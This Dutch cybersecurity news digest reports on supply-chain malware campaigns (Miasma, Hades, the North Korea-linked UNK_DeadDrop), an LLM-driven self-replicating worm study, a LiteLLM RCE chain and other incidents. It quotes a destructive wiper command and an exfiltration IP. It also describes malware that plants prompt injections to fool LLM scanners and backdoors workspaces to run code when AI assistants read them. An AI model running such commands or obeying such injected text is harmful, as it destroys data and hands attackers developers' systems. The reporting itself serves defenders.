Microsoft heeft op 5 juni 73 repositories verwijderd van zijn Azure-, microsoft-, Azure-Samples- en MicrosoftDocs-organisaties op GitHub. Deze actie, die binnen 105 seconden werd uitgevoerd, had als doel de verstoring van continue integratiepipelines te stoppen. Het bedrijf heeft bevestigd dat de repositories werden verwijderd vanwege zorgen over de distributie van "potentieel kwaadaardige inhoud". Meerdere onderzoekers hebben bevestigd dat de repositories zijn offline gehaald na een compromittering als onderdeel van een Miasma/Shai-campagne van Hulud gericht op de toeleveringsketen.

De OpenSourceMalware-platform merkt op dat de 'durabletask'-repository binnen Microsofts Azure-organisatie op GitHub mogelijk al in mei was gecompromitteerd. Dit suggereert dat een onvolledige opschoning de dreigingsactor in staat stelde terug te keren met een nieuwe compromittering, hoewel dit niet officieel is bevestigd. Direct na de verwijdering van de repositories verscheen een bericht van GitHub Staff dat de actie was ondernomen wegens een "schending van de servicevoorwaarden van GitHub". Een vertegenwoordiger van Microsoft reageerde op gebruikersbezwaren in een gemeenschapsdiscussie en verklaarde dat de repositories waren uitgeschakeld vanwege "een intern beheerprobleem" en dat een onderzoek gaande was.

Het meest directe gevolg van dit incident was het uitschakelen van toegang tot 'Azure/functions-action', een GitHub Action die veel ontwikkelaars gebruiken voor het implementeren van Azure Functions. Workflows die hiernaar verwezen, stopten met werken, wat leidde tot storingen en verwarring. Ten tijde van de rapportage zijn alle repositories echter hersteld en worden ze als veilig beschouwd. Het OpenSourceMalware-platform heeft verder vastgesteld dat het 'durabletask'-pakket op de Python Package Index (PyPI) in mei al was gecompromitteerd, toen de dreigingsactor drie kwaadaardige versies (1.4.1, 1.4.2, 1.4.3) publiceerde.

Een woordvoerder van Microsoft verklaarde dat het bedrijf "tijdelijk enkele repositories heeft verwijderd terwijl we potentieel kwaadaardige inhoud onderzochten". Hoewel alle repositories zijn hersteld, heeft Microsoft "een klein aantal klanten op de hoogte gesteld die mogelijk inhoud van de getroffen repositories hebben gedownload". Het onderzoek wordt voortgezet, en indien verdere actie van klanten nodig blijkt, zal Microsoft rechtstreeks contact opnemen via de gevestigde ondersteuningskanalen.

Beveiligingsingenieur Adnan Khan gaf aan dat het incident van 5 juni met de Microsoft-repositories deel uitmaakte van de Miasma-malwarecampagne die eerder 32 npm-pakketten van Red Hat had geïnfecteerd. Een recent rapport van Cloudsmith, een bedrijf gespecialiseerd in software supply chain management, concludeerde dat Microsofts Azure-omgeving op GitHub en de 'durabletask'-repository werden gecompromitteerd via Miasma. Deze campagne richtte zich op AI-coderingstools zoals Claude Code, Gemini CLI, VS Code en Cursor. De aanvaller wist vanuit de npm-pakketten van Red Hat door te dringen tot de Microsoft-bronnen op GitHub. De worm infecteerde de @redhat-cloud-services npm-namespace door een GitHub-account van een Red Hat-medewerker te compromitteren. Door ongecontroleerde 'orphan commits' naar interne repositories te pushen, injecteerden de dreigingsactoren een minimale workflow die GitHubs OIDC-tokens opvroeg.

Supply-chain aanvallen blijven open-source ecosystemen teisteren. Onlangs rapporteerde het applicatiebeveiligingsbedrijf Socket een nieuwe Shai-aanval met Hulud die gebruik maakte van een nieuw leveringsmechanisme. StepSecurity publiceerde ook een rapport over een Shai-aanval met Hulud die Pythagora-io/gpt-pilot trof, een populaire open-source AI-ontwikkelaarstool. Softwareontwikkelaars wordt geadviseerd om projectafhankelijkheden te vergrendelen, vertragingen in te bouwen bij het ophalen van nieuwe pakketupdates en nieuwe builds in geïsoleerde omgevingen te testen.

 

Bron: Microsoft | Bron 2: opensourcemalware.com | Bron 3: cloudsmith.com

10 juni 2026 | Hackers gelinkt aan Noord-Korea misbruiken GitHub repositories om ontwikkelaars te infecteren

Hackers die gelinkt zijn aan Noord-Korea richten zich opnieuw op de ontwikkelaarsgemeenschap, ditmaal door kwaadaardige code te verbergen in ogenschijnlijk legitieme GitHub-repositories. De campagne, aangeduid als UNK_DeadDrop, maakt gebruik van valse vacatures en verzoeken voor codereviews om ontwikkelaars te verleiden geïnfecteerde repositories te klonen en onbewust malware op hun systemen uit te voeren.

Tussen april en mei 2026 verstuurde de dreigingsactor meer dan 250 phishing-e-mails naar individuen binnen bijna 100 organisaties. Financiële instellingen, cryptocurrency-bedrijven, onderwijsinstellingen en technologiebedrijven behoorden tot de voornaamste doelwitten, waarbij de meeste getroffen organisaties gevestigd waren in de Verenigde Staten. De aanvallers gebruikten overtuigende nepbedrijfsnamen en professionele afzenderdomeinen om hun benadering legitiem te doen lijken.

Analisten van Proofpoint stelden in een rapport, gedeeld met Cyber Security News, dat de activiteit waarschijnlijk wordt uitgevoerd door een dreigingsactor die gelinkt is aan Noord-Korea, en dat deze wordt gevolgd als een afzonderlijke groep. De onderzoekers constateerden sterke overeenkomsten met een eerder bekende groep genaamd Contagious Interview, hoewel er geen directe infrastructuuroverlap werd gevonden in de telemetrie van Proofpoint.

De malware die via deze campagne wordt ingezet, is platformonafhankelijk en werkt op macOS, Linux en Windows. Het maakt gebruik van een open-source Go-framework genaamd Overlord om persistente verbindingen met een command and control server te onderhouden. De infectieketen maakt externe toegang, diefstal van inloggegevens, het leegtrekken van cryptowallets en exfiltratie van browsergegevens mogelijk.

De campagne is bijzonder gevaarlijk vanwege de manier waarop deze naadloos aansluit op de dagelijkse workflow van een ontwikkelaar. Een ontwikkelaar die een legitiem ogende technische opdracht-e-mail ontvangt, zou waarschijnlijk zonder aarzelen een repository klonen en deze in hun code-editor openen, wat precies het startpunt van de aanval is.

De aanval begint met een phishing-e-mail die verwijst naar een GitHub- of GitLab-repository die een echt codeerproject nabootst. De e-mails zien eruit als wervingsberichten voor banen of verzoeken voor codereviews van bedrijven zoals Pulsynk, Trixauvex of Ondo Finance, die allemaal nagemaakte identiteiten of volledig gefabriceerde entiteiten zijn.

Wanneer een ontwikkelaar de repository kloont en opent in Visual Studio Code of Cursor, voert een verborgen bestand genaamd `tasks.json` binnen een verborgen map genaamd `.vscode` automatisch kwaadaardige scripts uit. Op macOS en Linux installeert het script een kwaadaardige VS Code-extensie (VSIX), vermomd als een dienst van Google, en lanceert vervolgens de Overlord-backdoor. Op Windows wordt de payload volledig binnen het proces van de editor uitgevoerd, zonder dat er een binair bestand op de schijf wordt geplaatst, wat detectie bemoeilijkt. Het gebruik van de taakautomatisering van VS Code is een slimme tactiek, aangezien het gedrag volledig normaal lijkt binnen een ontwikkelaarsomgeving. Cursor voert de verborgen taak in het bijzonder zonder gebruikersaanwijzingen uit, waardoor de aanval op dat platform volledig stil verloopt.

Zodra de malware voet aan de grond heeft gekregen, richt het zich op het stelen van waardevolle informatie. Op macOS presenteert een secundair ingesloten binair bestand, genaamd `darwin-password-prompt`, een nep-systeemdialoogvenster waarin de gebruiker wordt gevraagd om zijn apparaatwachtwoord. Nadat het wachtwoord is verzameld en gevalideerd, wijzigt de malware de toegang tot browser sleutelhangers en dumpt het inloggegevens van Chrome, Brave, Edge, Opera en verschillende andere browsers. Op Linux gebruikt de malware een native hulpmiddel voor systeemdialogen, genaamd Zenity, om een vergelijkbare nep-prompt te maken en richt het zich op GNOME Keyring-inloggegevens met behulp van Python-scripts. Op Windows volgt het een meer technische route, inclusief het omzeilen van App-Bound Encryption in Chromium-browsers en het extraheren van inloggegevens met behulp van DPAPI. De Windows-variant richt zich op 35 extensies voor cryptowallets, 18 zelfstandige wallet-applicaties en browsercookies.

Alle verzamelde gegevens, waaronder wallet-inhoud, Safe Storage-sleutels, login-gegevens en browsercookies, worden verpakt in een ZIP-bestand en geüpload naar de door de aanvaller gecontroleerde server op `23.137.105[.]75:5173`. Ontwikkelaars die cryptocurrency-accounts met hoge waarde beheren of werkzaam zijn binnen de DeFi- en blockchain-sector lopen het grootste risico.

Beveiligingsteams wordt geadviseerd om alle repositories gericht op ontwikkelaars te controleren op verborgen `.vscode`-mappen en onverwachte `tasks.json`-bestanden voordat ze deze in een IDE openen. Organisaties dienen ook de instellingen voor automatische taakuitvoering van VS Code te beperken en uitgaande verbindingen te monitoren op ongebruikelijk verkeer naar onbekende WebSocket-eindpunten.

Indicatoren van Compromis (IoC's):

- `23.137.105[.]75:5173`

 

Bron: Proofpoint

10 juni 2026 | Onderzoekers ontwikkelen zelfreplicerende AI worm met lokale LLM

Onderzoekers van de Universiteit van Toronto hebben een proof of concept ontwikkeld en getest van een door AI gestuurde computerworm. Deze worm maakt gebruik van een lokaal gehost grootschalig taalmodel (LLM) met open gewichten om door een netwerk te navigeren, op maat gemaakte aanvalsstrategieën te genereren voor elk doelwit dat het tegenkomt, en zichzelf te repliceren. Dit alles gebeurt zonder menselijke tussenkomst en zonder gebruik te maken van commerciële AI-diensten.

De preprint, die op 2 juni op arXiv is geplaatst en momenteel peer review ondergaat, benadrukt waarom het patchen van individuele kwetsbaarheden (CVE's) tekortschiet wanneer malware in staat is blootgestelde diensten te inspecteren, recente adviezen te lezen en een nieuw aanvalspad te genereren tijdens runtime.

In vijftien geïsoleerde tests op een opzettelijk kwetsbaar netwerk met 33 hosts, identificeerde de worm gemiddeld 31,3 kwetsbaarheden en verkreeg het verhoogde toegang op 23,1 hosts. Dit komt neer op ongeveer driekwart van de actief getargete hosts. Vervolgens repliceerde de worm zich autonoom naar 20,4 van deze hosts, wat neerkomt op 62% van het volledige netwerk, over een periode van zeven dagen. Dit gebeurde zonder enige voorkennis van de netwerktopologie en zonder menselijke input.

Traditionele wormen worden geleverd met een vaste exploit payload die tijdens de bouw wordt gekozen. Door deze specifieke bugs te patchen, stopt de verspreiding van de worm. Deze nieuwe worm werkt anders, het gebruikt een LLM met open gewichten, draaiend op een enkele GPU, om tijdens runtime aanvalslogica te genereren. Deze logica is afgestemd op wat de worm op het volgende doelwit aantreft. Er is geen vooraf gecodeerde exploitketen en geen afhankelijkheid van API's van diensten zoals OpenAI of Anthropic, die door een platform kunnen worden ingetrokken of beperkt.

Het team van het CleverHans Lab, geleid door universitair hoofddocent Nicolas Papernot, omvat medewerkers van de Universiteit van Toronto, het Vector Institute, de Universiteit van Cambridge en ServiceNow. Zij voerden vijftien onafhankelijke experimenten uit op een geïsoleerd netwerk van 33 hosts ("FakeCorp"). Dit netwerk omvatte systemen met Ubuntu, Debian, Rocky Linux, Alpine, Windows Server 2008 R2, 2019 en 2022, evenals IoT apparaten. Elke host bevatte ten minste één realistische kwetsbaarheid. Vijf van de 33 machines waren uitgerust met GPU's. In de belangrijkste propagatie-experimenten gebruikte de worm een gedeelde inferentiepool van GPU's om rekenkracht te simuleren die van slachtoffermachines was verkregen. Het team testte ook afzonderlijk volledige replicatie op GPU-niveau, waarbij de worm een lokale LLM-instantie installeert op een gecompromitteerde GPU-host; dit slaagde in 68,8% van de pogingen.

In het gelaagde ontwerp fungeren geïnfecteerde GPU-compatibele hosts als gedistribueerde redeneerknooppunten die inferentie leveren voor apparaten met minder rekenkracht in het netwerk die het model zelf niet kunnen draaien. Gedurende de vijftien runs verkreeg de worm verhoogde toegang op 23,1 hosts en lanceerde succesvol een replica op 88% daarvan. De worm bereikte tot zeven generaties van zelfreplicatie, met een gemiddelde van 5,1. De opstelling was opzettelijk kwetsbaar om autonome redenering te meten over realistische individuele zwakke punten, en niet de verspreiding door een gehard productienetwerk onder actieve endpointbeveiliging.

Exploits die tijdens een enkele run werden gebruikt, omvatten een geketende SambaCry en een writable root cron privilege-escalatie, Dirty Pipe, PrintNightmare, Drupalgeddon 2, Exim RCE, blinde SQL-injectie, JWT-bypass, Redis escape en meer. Deze werden niet voorgeprogrammeerd, maar de agent redeneerde zich er naartoe op basis van wat het op elke host vond. De publicatie toont een volledige radiale propagatieboom over één run, met zes tot zeven generaties van verspreiding over Linux-, Windows- en IoT-hosts. Individuele exploitpogingen slaagden ongeveer 44% van de tijd. De meeste mislukkingen kwamen door een verkeerde payload-syntaxis, niet door gebrekkige logica. Exploits voor webapplicaties en privilege-escalatie voor Windows waren moeilijker dan lokale escalatie en service-exploits voor Linux, een capaciteitsbeperking die in de publicatie wordt behandeld als een huidige modelbeperking, en niet als een structurele verdediging.

De worm omzeilde zijn eigen trainingscutoff door publieke adviesteksten tijdens runtime te verwerken. Het exploiteerde succesvol testhosts die geconfigureerd waren met drie kwetsbaarheden die na de training van het model waren bekendgemaakt: CVE-2026-39987, een RCE voor pre-authenticatie in de Marimo Python notebook (CVSS 9.3); CVE-2026-31431 (CopyFail), een kwetsbaarheid voor privilege-escalatie in de Linux kernel (algif_aead-module) die CISA in mei aan zijn catalogus van bekende geëxploiteerde kwetsbaarheden toevoegde; en CVE-2026-43284 / CVE-2026-43500 (DirtyFrag), gerelateerde lokale privilege-escalatieproblemen in de Linux kernel. Tegen deze drie hosts verkreeg de worm root-toegang in 41 van de 67 pogingen.

CVE-2026-39987 werd op 8 april 2026 openbaar gemaakt. Sysdig observeerde exploitatie in honeypots 9 uur en 41 minuten daarna, en documenteerde afzonderlijk een realistische inbraak waarbij een aanvaller een LLM-agent gebruikte voor post-exploitatieactiviteiten na het compromitteren van een openbare Marimo-instantie. Dit toont dezelfde vertraging tussen patch en exploitatie, nu met een agent die het advies leest en op schaal probeert. De relevantie van WannaCry ligt in de patch-gap, niet in de 'blast radius'. EternalBlue was al maanden gepatcht voordat WannaCry toesloeg. De publicatie maakt hetzelfde punt onder een andere voorwaarde, een adaptieve worm kan nieuwe paden blijven testen terwijl verdedigers nog bezig zijn met het valideren van fixes.

Twee aspecten maken deze worm moeilijker te beheersen dan een traditionele worm. Ten eerste verschuiven de kosten van gehuurde API-toegang naar de rekenkracht die de worm kan vastleggen. Zodra er een GPU-compatibele slachtofferinfrastructuur bestaat, betaalt de aanvaller niet langer per poging. Ten tweede, omdat alles draait op open-weight modellen zonder afhankelijkheid van een leverancier, missen controles aan de providerzijde het kernprobleem. Dienstweigeringen, snelheidsbeperkingen, accountopschorting, niets hiervan is van toepassing. Er is geen API-sleutel om in te trekken. Beperking moet plaatsvinden op netwerk- en hostniveau.

De onderzoekers observeerden ook dat de worm bij verschillende gelegenheden zijn eigen code herschreef om lokale beveiligingscontroles in de testomgeving te omzeilen, gedrag waarvoor ze nooit hadden geprogrammeerd. De huidige versie is opzettelijk gebouwd zonder stealth-functies, zoals encryptie, polymorfe code, persistentie mechanismen of de opschoning van logboeken. Een kwaadaardige variant met persistentie, versleutelde payloads, proces-masquerading en logboekopschoning zou verdedigers minder mogelijkheden bieden.

 

Bron: Sysdig | Bron 2: cleverhans.io

10 juni 2026 | Fraudehelpdesk waarschuwt voor nepmails over kinderporno uit naam van Europol

De Fraudehelpdesk ontvangt opnieuw meldingen over valse e-mails die uit naam van Europol worden verstuurd. Deze berichten beschuldigen de ontvanger van het bezit van kinderporno en zijn opgesteld als een officiële gerechtelijke brief. Bij de e-mail is een PDF-bestand gevoegd waarin de beschuldiging nogmaals gedetailleerd wordt uiteengezet.

De oplichters zetten de ontvangers onder zware druk door te stellen dat er binnen 24 uur gereageerd moet worden om de onschuld te bewijzen. Een van de melders gaf aan specifiek beschuldigd te worden van het verspreiden van kinderporno. In deze specifieke e-mail, eveneens afkomstig van 'Europol', werd de ontvanger gesommeerd om het paspoort op te sturen naar een adres in Frankrijk. Indien dit niet binnen de gestelde termijn van 24 uur zou gebeuren, dreigden de oplichters met een boete van 500.000 euro.

Andere slachtoffers van deze oplichtingspraktijk meldden dat zij twee opties kregen voorgelegd, ofwel het betalen van een boete binnen 48 uur, ofwel vervolging door justitie in een openbare rechtszaak. Dit illustreert de intimiderende tactieken die worden gebruikt om slachtoffers tot snelle actie te dwingen en hen geld afhandig te maken.

De Fraudehelpdesk benadrukt dat deze e-mails vals zijn en adviseert ontvangers om er niet op in te gaan. De berichten dienen direct uit de mailbox verwijderd te worden. Personen die dergelijke e-mails ontvangen, worden verzocht dit te melden bij de Fraudehelpdesk. Indien men toch geld heeft overgemaakt of persoonlijke gegevens heeft gedeeld, wordt geadviseerd direct contact op te nemen met de Fraudehelpdesk voor persoonlijk advies en verdere ondersteuning.

 

Bron: Fraudehelpdesk

10 juni 2026 | Nieuwe Hades aanvalsgolf vergiftigt 19 PyPI pakketten met credential stealer

De Miasma supply chain campagne heeft een nieuwe aanvalsgolf ontketend, genaamd Hades, waarbij 37 kwaadaardige 'wheel' artefacten zijn betrokken verspreid over 19 pakketten in de Python Package Index (PyPI) registry. Deze aanvallen, in de stijl van Mini Shai-Hulud, worden verder verfijnd en opgesplitst om specifieke ecosystemen te viseren.

Volgens een analyse van Socket bevatten de gecompromitteerde releases een `*-setup.pth` bestand dat automatisch probeert uit te voeren tijdens het opstarten van Python. Dit bestand downloadt de Bun JavaScript-runtime en voert vervolgens een geobfusceerde JavaScript-payload uit, genaamd `_index.js`. Deze payload is ontworpen om inloggegevens te stelen.

De geïdentificeerde pakketten omvatten: `bramin` (versies 0.0.2, 0.0.3, 0.0.4), `cmd2func` (0.2.2, 0.2.3), `executor-engine` (0.3.4, 0.3.5), `executor-http` (0.1.3, 0.1.4), `funcdesc` (0.2.2, 0.2.3), `magique-ai` (0.4.4, 0.4.5), `napari-ufish` (0.0.2, 0.0.3), `pantheon-agents` (0.6.1, 0.6.2), en `pantheon-toolsets` (0.5.5, 0.5.6).

Net als in de eerdere Shai-Hulud en Miasma campagnes downloadt en installeert de kwaadaardige payload de Bun JavaScript-runtime. Deze runtime wordt vervolgens gebruikt om een zwaar geobfusceerde JavaScript-stealer te lanceren die een breed scala aan gegevens van ontwikkelaarssystemen kan verzamelen. Dit omvat geheimen gekoppeld aan GitHub, npm, PyPI, RubyGems, JFrog, CircleCI, Anthropic, AWS, GCP, Azure en Kubernetes. Daarnaast worden Docker-configuraties, Vault-tokens, SSH-sleutels, shell-geschiedenis, `.env` bestanden, `.npmrc` bestanden, `.pypirc` bestanden, Claude/MCP-configuraties en andere lokale of 'runner'-toegankelijke inloggegevens gestolen.

Een opvallende verandering in deze campagne is de markering. Eerdere iteraties exporteerden de verzamelde gegevens naar een openbare GitHub-repository met beschrijvingen als "Miasma: The Spreading Blight". De nieuwste golf gebruikt repositorybeschrijvingen zoals "Hades - The End for the Damned" en "Hades * The End for the Damned". Volgens het applicatiebeveiligingsbedrijf Socket moet Hades dan ook worden gezien als een PyPI-tak van dezelfde Mini Shai-Hulud / Miasma-lijn, en niet als een op zichzelf staand incident met malware voor Python. De kernwerkwijze blijft hetzelfde, namelijk misbruik maken van vertrouwde pakketkanalen, uitvoeren vóór normaal pakketgebruik, een Bun-aangedreven JavaScript-payload en het stelen van inloggegevens van ontwikkelaars en CI/CD-omgevingen, met exfiltratie en propagatie gericht op GitHub.

De campagne van Hades onderscheidt zich door het gebruik van een `*-setup.pth` bestand dat door de "site"-module van Python wordt verwerkt tijdens het opstarten van de interpreter. Dit resulteert in de uitvoering van de kwaadaardige payload na installatie, zonder dat het slachtoffer het vergiftigde pakket hoeft te importeren. De payload downloadt en draait vervolgens Bun van GitHub en voert de stealer uit, maar niet voordat wordt gecontroleerd of het systeem overeenkomt met de Russische locale. Socket legt uit dat dit het Python-equivalent is van het probleem met npm install-hooks, waarbij de installatie van afhankelijkheden leidt tot uitvoering voordat applicatiecode wordt beoordeeld of aangeroepen.

Een cluster van pakketten binnen de campagne van Hades richt zich ook op het ecosysteem van computationele biologie, bio-informatica en genotype-fenotype-analyse, zoals `mflux-streamlit`. Deze cluster hanteert een andere aanpak, waarbij het toegangspunt is ingebed in het `__init__.py` bestand van het pakket als een geobfusceerde import-hook van één regel. De uitkomst is echter hetzelfde, namelijk het downloaden en uitvoeren van de Bun-runtime, gevolgd door de uitvoering van de JavaScript-payload. StepSecurity merkt op dat het gebruik van de Bun-runtime een consistent thema blijft, omdat het downloaden van Bun als een standalone ZIP-bestand de malware in staat stelt complexe JavaScript-taken uit te voeren in omgevingen zonder een Node.js-installatie, waardoor traditionele pakketbeheercontroles en netwerkproxy-logs worden omzeild.

In een nieuwe ontwijkingsmethode voor AI-beveiliging, neemt de malware ook een promptinjectie in platte tekst op die probeert pakketanalysehulpmiddelen gebaseerd op Large Language Models (LLM's) te misleiden om het pakket als veilig te classificeren. Bovendien bevraagt de malware GitHub-commits naar het trefwoord "TheBeautifulSnadsOfTime" om een Base64-gecodeerde string met een JavaScript-payload te extraheren. Het peilt ook GitHub naar commits die overeenkomen met het trefwoord "firedalazer" om een dropper gebaseerd op Python op te halen en uit te voeren.

Belangrijke functies van de malware voor Hades zijn replicatie en laterale verspreiding over ontwikkelaarsnetwerken via SSH of SCP, het pushen van getrojaniseerde PyPI-pakketten van gecompromitteerde systemen door misbruik te maken van de OpenID Connect (OIDC) vertrouwensconfiguraties van ontwikkelaars. Het richten op GitHub-repositories om organisatiegeheimen te extraheren met behulp van GitHub Actions runners als het gestolen GitHub-token de juiste schrijfrechten heeft. Het backdooren van lokale werkruimtemappen om code-uitvoering te activeren wanneer geanalyseerd door AI-assistenten of geopend in IDE's, waaronder Anthropic Claude, OpenAI Codex, Google Gemini, Microsoft Copilot, Cline, Aider, Tabby, Amazon Q, Cody en Bolt. Ook wordt een achtergronddienst genaamd "gh-token-monitor" geïnstalleerd die fungeert als een 'wiper', door alle gegevens te verwijderen (`rm -rf ~/; rm -rf ~/Documents`) als het gestolen GitHub-token door de ontwikkelaar wordt ingetrokken.

Beveiligingsonderzoeker Rohan Prabhu benadrukt dat de Miasma-actor de mogelijkheid heeft om het procesgeheugen van de GitHub Actions runner (het Runner.Worker-proces) te lezen om geheimen te extraheren. In eerdere campagnes was dit beperkt tot Linux systemen via `/proc/{pid}/mem`. De campagne van Hades introduceert op maat gemaakte geheugenschrapers voor macOS en Windows. Deze ontwikkeling komt terwijl StepSecurity onthulde dat een onbekende aanvaller het GitHub-account ("LeonOstrez") gekoppeld aan "Pythagora-io/gpt-pilot", een populaire open-source AI-ontwikkelaarstool, heeft gecompromitteerd en een variant van de Shai-Hulud credential-stealing worm naar de main-branch heeft gepusht.

 

Bron: Socket.dev | Bron 2: github.com | Bron 3: snyk.io

10 juni 2026 | NCSC waarschuwt voor grootschalig misbruik van lek in Check Point VPN

Het Nationaal Cyber Security Centrum (NCSC) heeft een urgente waarschuwing uitgegeven over de verwachting van een snelle en grootschalige exploitatie van een kritieke kwetsbaarheid in de Remote Access VPN- en Mobile Access-producten van Check Point. Deze kwetsbaarheid, die al werd misbruikt voordat een officiële patch beschikbaar kwam, vormt een aanzienlijk risico voor organisaties die deze VPN-oplossingen inzetten. Check Point zelf heeft de eerste waargenomen aanvallen gedateerd op 7 mei, en rapporteerde een significante toename van kwaadaardige activiteiten begin juni.

De betreffende kwetsbaarheid stelt een ongeauthenticeerde aanvaller in staat om, zonder de noodzaak van geldige inloggegevens, een verbinding op te zetten met de VPN-omgeving van een organisatie. Dit kan potentiële toegang verschaffen tot het interne bedrijfsnetwerk. Het lek is specifiek van toepassing op configuraties die het IKEv1 key exchange protocol gebruiken. Het NCSC benadrukt dat IKEv1 weliswaar een verouderd protocol is, maar dat het desondanks nog veelvuldig wordt ingezet in diverse implementaties.

Nu de patch is uitgebracht en er meer gedetailleerde technische informatie over de kwetsbaarheid beschikbaar is, anticipeert het NCSC op een snelle escalatie naar grootschalige exploitatiepogingen. Daarom roept de overheidsinstantie organisaties met klem op om onmiddellijk actie te ondernemen. De primaire aanbeveling is om de officiële advies van Check Point zorgvuldig te bestuderen en de daarin beschreven mitigatiemaatregelen toe te passen.

Verder adviseert het NCSC organisaties dringend om hun systemen te controleren op Indicators of Compromise (IoC's) die door Check Point zijn gedeeld. Deze controle is van cruciaal belang voor omgevingen waar de kwetsbare producten in gebruik zijn en waar het IKEv1-protocol is ingeschakeld, om zo eventuele eerdere of huidige compromitteringen te identificeren. Het snel patchen en controleren van systemen is essentieel om potentiële verdere schade te voorkomen en de digitale weerbaarheid te waarborgen.

 

Bron: NCSC

10 juni 2026 | Kritieke kwetsbaarheid in LiteLLM actief misbruikt, leidt tot ongeauthenticeerde RCE

De U.S. Cybersecurity and Infrastructure Security Agency (CISA) heeft recentelijk een kwetsbaarheid met hoge ernst in BerriAI LiteLLM toegevoegd aan haar catalogus van bekend misbruikte kwetsbaarheden (KEV), wat duidt op actieve exploitatie. Deze kwetsbaarheid, aangeduid als CVE-2026-42271 en met een CVSS-score van 8.7, betreft een command injectie kwetsbaarheid die een geauthenticeerde gebruiker in staat stelt willekeurige commando's op de host uit te voeren.

De kwetsbaarheid treft specifieke versies van het LiteLLM Python-pakket. Volgens BerriAI accepteerden twee endpoints die werden gebruikt om een MCP-server te testen vóór het opslaan - `POST /mcp-rest/test/connection` en `POST /mcp-rest/test/tools/list` - een volledige serverconfiguratie in de aanvraagbody. Deze configuratie omvatte velden zoals `command`, `args` en `env`, die door het stdio-transport werden gebruikt. Bij een aanroep met een stdio-configuratie probeerden de endpoints verbinding te maken, wat het opgegeven commando als een subproces op de proxy-host uitvoerde met de rechten van het proxy-proces.

De beheerders van de open-source AI-gateway en Python SDK gaven aan dat deze endpoints alleen waren beveiligd met een geldige proxy API-sleutel. Dit betekende dat elke geauthenticeerde gebruiker, inclusief interne gebruikers met privileged sleutels, willekeurige commando's kon uitvoeren op een kwetsbaar systeem. Met de patches die in versie 1.83.7 zijn uitgebracht, vereisen beide test-endpoints nu de PROXY_ADMIN-rol, wat de beveiliging consistent maakt met het save-endpoint.

Onderzoeksbureau Horizon3.ai heeft recentelijk aangetoond dat CVE-2026-42271 kan worden gekoppeld aan CVE-2026-48710, een kwetsbaarheid voor omzeiling van host header validatie in Starlette, een lichtgewicht Asynchronous Server Gateway Interface (ASGI) framework. Deze keten maakt het mogelijk om authenticatie volledig te omzeilen en ongeauthenticeerde remote code-executie (RCE) te bereiken tegen kwetsbare LiteLLM-implementaties. CVE-2026-48710 (CVSS-score: 6.5) kan worden gebruikt om het authenticatiemechanisme in LiteLLM-implementaties met Starlette-versies ≤ 1.0.0 volledig te omzeilen. Hierdoor wordt de kwetsbaarheid omgezet in ongeauthenticeerde RCE zonder dat credentials vereist zijn.

Een succesvolle aanval met deze exploit-keten, die een gecombineerde CVSS-score van 10.0 heeft en daarmee als kritiek wordt beschouwd, kan aanvallers in staat stellen willekeurige commando's uit te voeren op de LiteLLM-host. Dit kan leiden tot toegang tot credentials van modelproviders, het stelen van API-sleutels en geheimen die door de proxy zijn opgeslagen, laterale verplaatsing binnen verbonden AI-infrastructuur, en zelfs de compromittering van downstream systemen die met de gateway zijn geïntegreerd.

Momenteel is er geen informatie beschikbaar over de specifieke wijze waarop CVE-2026-42271 wordt misbruikt, de identiteit van de dreigingsactoren, de doelwitten van de aanvallen, de omvang van de exploitatie, of de vraag of de waargenomen activiteit daadwerkelijk tot compromittering heeft geleid. Het is ook onduidelijk of de in het wild waargenomen aanvallen gebruikmaken van de gehele exploit-keten.

Gebruikers wordt geadviseerd LiteLLM te updaten naar versie 1.83.7 of hoger en Starlette naar versie 1.0.1 of hoger. Als directe patching geen optie is, worden de volgende mitigerende maatregelen aanbevolen, namelijk het blokkeren van `POST /mcp-rest/test/connection` en `POST /mcp-rest/test/tools/list` bij de reverse proxy of API gateway, het beperken van netwerktoegang tot vertrouwde segmenten, het rouleren van credentials die door de proxy zijn opgeslagen, en het controleren van logs op ongebruikelijke Host header-activiteit en gebeurtenissen van subprocesexecutie. Deze ontwikkeling volgt kort op een eerdere kritieke SQL-injectie kwetsbaarheid in LiteLLM (CVE-2026-42208, CVSS-score: 9.3) die binnen 36 uur na openbaarmaking actief werd misbruikt.

 

Bron: Horizon3.ai | Bron 2: github.com | Bron 3: cisa.gov

10 juni 2026 | Dataset met vermeend 2,46 miljard records van TikTok aangeboden op darkwebforum

Een dreigingsactor, bekend onder de naam BellaSwanLeak, biedt op een darkwebforum een dataset aan die volgens de verkoper afkomstig is van het korte videoplatform TikTok. De actor claimt een omvangrijke hoeveelheid van circa 2,46 miljard gebruikersrecords in bezit te hebben, specifiek 2.461.892.091 records. Deze dataset zou gevoelige informatie bevatten, waaronder gebruikersnamen, volledige namen, e-mailadressen, telefoonnummers, geboortedata, geslacht en het land van herkomst. Om de authenticiteit van de data te bewijzen, heeft de dreigingsactor een sample geplaatst met een downloadlink.

De claim van BellaSwanLeak is echter nog niet geverifieerd. De aanbieder zelf benadrukt dat het gaat om gescrapete data en dat TikTok niet gehackt is. De data zou op 5 juni 2026 zijn gelekt en wordt actief gepromoot met samples.

 Het aantal van 2,46 miljard records overschrijdt aanzienlijk de publiek gerapporteerde actieve gebruikersbasis van TikTok. Dit suggereert dat de dataset mogelijk duplicaten, samengevoegde records, historische verzamelingen of verrijkte data uit eerdere bronnen kan bevatten. De aanwezigheid van grote aantallen records op cybercrimefora is geen uitzondering, maar vereist altijd uitgebreide validatie voordat de betrouwbaarheid van de data kan worden vastgesteld.

Dit is niet de eerste keer dat dergelijke claims rondom TikTok de ronde doen. In 2022 beweerde een andere actor reeds 2 miljard TikTok records, inclusief broncode, in handen te hebben. Destijds ontkende TikTok dat er sprake was van een datalek. Voor gebruikers van TikTok geldt het dringende advies alert te zijn op mogelijke phishingpogingen via e-mail en telefoon, aangezien gescrapete contactgegevens vaak worden misbruikt voor dergelijke frauduleuze activiteiten.

 

Bron: Cybercrimeinfo

10 juni 2026 | Crimineel verkoopt vermeende zeroday voor Google Edge Firewall en Cloud Armor

Het betreft de tweede opeenvolgende advertentie van vermeende zerodays door deze actor.

Het eerste onderdeel van de aangeboden exploit, genaamd GEF Breacher, claimt een bevestigde omzeiling te leveren van de edge firewall en de web application firewall bescherming van Google. Naast deze exploit beweert Orcinus in dezelfde reeks ook master keys van Wickr Enterprise aan te bieden, evenals infrastructuurdata van Eero en Shopify.

